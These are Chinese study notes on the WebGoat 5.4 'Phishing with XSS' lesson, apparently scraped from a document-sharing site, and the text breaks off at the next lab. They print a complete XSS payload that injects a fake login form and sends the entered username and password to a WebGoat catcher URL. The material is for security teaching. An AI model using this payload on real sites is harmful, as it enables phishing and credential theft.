- 1、本文档共14页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
WebGoat 学习笔记九
WebGoat 学习笔记九
—跨站脚本攻击(Cross-Site Scripting (XSS))
瞿靖东 2015/11/10
版本号:WebGoat 5.4
1、使用 XSS 钓鱼(Phishing with XSS)
技术概念或主题(Concept / Topic To Teach)
在服务端对所有输入进行验证总是不错的做法。当用户输入非法 HTTP 响应时容易造成
XSS。在 XSS 的帮助下,你可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来
说很难发现该内容是否存在威胁。
技术原理(How It works )
HTML 文档内容很容易篡改的,如果你有权限操作页面源代码。
总体目标(General Goals )
创 建 一 个 form , 要 求 填 写 用 户 名 和 密 码 。 将 数 据 提 交 到
http://localhost/WebGoat/catcher?PROPERTY=yesuser=catchedUserNamepassword=catched
PasswordNam
操作方法(Solutions)
利用 XSS 可以在已存在的页面中进一步添加元素。该解决方案包括两部分,你需要结合
起来使用:
受害人填写一个表格;
以读取脚本的形式,将收集到的信息发送给攻击者。
一个带用户名和密码输入框的表格如下:
form
brbrHRH3This feature requires account login:/H3 brbr
Enter Username:brinput type=text id=user name=userbr
Enter Password:brinput type=password name=passbr
/formbrbrHR
WebGoat 学习笔记九 搜索这段代码,你就能看到页面中增加了一个表单。
现在你需要一段脚本:
script
function hack()
{alert(Had this been a real attack... Your credentials were just stolen. User Name=”+
document.form.user.value+Password=”+document.form.pass.value); XSSlmage=new Image (); XSSlmage.src=http://localhost/WebGoat/catcher?PROPERTY=yesuser=+ document.form.user.value+password=+document.form.pass.value+””;
}
/script
这段代码会读取你在表单上输入的用户名和密码信息,将这些信息发送给捕获这些信息
的 WebGoat.
最后,就是要将这两段代码合并。最终需要输入的代码如下:
scriptfunction hack(){ alert(Hadthis been a real attack... Your credentialswere just stolen. User
Name = + document.forms[1].user.value + Password = + document.forms[1].pass.value); XSSImage=new Image();
XSSImage.src=http://localhost/WebGoat/catcher?PROPERTY=yesuser=+document.forms[1].u ser.value + password= + document.forms[1].pass.value + ;} /scriptformbrbrHRH3This feature requires account login:/H3 brbrEnter Username:brinput type=text id=user name=userbrEnter Password:brinput type=password name = passbrinput type=button name=login value=login
onclick=hack()/formbrbrHR
需要注意,最终的代码必须进行 js 压缩(取消缩进)才能生效。
WebGoat 学习笔记九 搜索这段代码,你会看到一个要求输入用户名密码的表单,输入用户名密码,点击登录,
WebGoat 会将你输入的信息捕获并反馈给你。
2、跨站脚本攻击(LAB: Cross Site Scripting)
技术概念或主题(Concept / Topic To Teach)
输入验证是一个很好的
您可能关注的文档
- vertexiv测高测距仪使用说明.doc
- vfd应用指南(基本电路).doc
- vf8z使用使用指南.doc
- vgus30开发工具使用说明.doc
- vericut与nx接口的配置及应用模拟方法.doc
- vgus43开发工具使用说明.doc
- vgus系列组态屏介绍.doc
- vic3d非接触全场应变测量系统.doc
- vid78多磁极步进电机推荐2010.doc
- vicell细胞计数仪使用说明.doc
- (二诊)凉山州2025届高三第二次教学质量诊断性检测 历史试卷(含答案.docx
- 激光脱毛培训课件.pptx
- 2024-2025学年广东省惠州市高二(上)期末数学试卷(含答案).pdf
- 校园清洁实践报告.docx
- 2024-2025学年广东省广州市八区联考高一上学期期末教学质量监测数学试卷(含答案).pdf
- (二诊)凉山州2025届高三第二次教学质量诊断性检测 政治试卷(含答案.docx
- 信息工程博士实践报告.docx
- 2024-2025学年吉林省吉林市蛟河实验中学高一(上)期末数学试卷(含答案).pdf
- 组装调试培训课件.pptx
- 2024-2025学年湖南省湘西州高一(上)期末数学试卷(含答案).pdf
文档评论(0)